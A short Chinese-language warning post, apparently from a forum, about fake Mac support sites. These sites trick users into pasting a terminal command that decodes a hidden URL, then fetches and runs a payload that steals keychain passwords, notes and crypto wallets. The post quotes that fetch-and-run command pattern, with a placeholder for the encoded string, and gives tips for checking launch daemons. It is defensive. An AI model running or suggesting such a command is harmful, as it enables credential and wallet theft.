现在的一些木马会伪装成Mac技术支持/教程网站,通常会教你解决常见问题,建立信任度,最后会给你一个“复制粘贴到终端”的命令。
命令内容:
bin/bash -c "$(curl -fsSL $(echo [long_string] | base64 -d))"当你运行并输入管理员密码后,会盗取你的钥匙串密码、备忘录内容、加密货币钱包,打包压缩上传到攻击者服务器,属于定向窃取类木马。
因此,不要盲目复制网上的命令。
同样,现在很多盗版Mac软件的破解插件,可能会隐藏破解的命令,需要你双击调用并输入管理员密码。我之前有过类似的经历,不知道我的Mac上面有没有病毒。
所以,在终端运行命令时,要检查命令是否存在恶意操作。如果无法查看命令代码,就不要输入管理员密码。
如果你不放心你的电脑,可以在终端中输入
ls /Library/LaunchAgents或者
ls /Library/LaunchDaemons检查有没有莫名其妙的守护进程。如果有的话,先备份,再删除这些守护进程,重启电脑。
PS: 守护进程较多,建议整理到文档并发给 ChatGPT 检查。
参考文章
Mac-Support gesucht, Malware gefunden: Trickbetrüger verbreiten Trojaner per Kommandozeilenbefehl:https://www.mactechnews.de/news/article/Mac-Support-gesucht-Malware-gefunden-Trickbetrueger-verbreiten-Trojaner-per-Kommandozeilenbefehl-187809.html
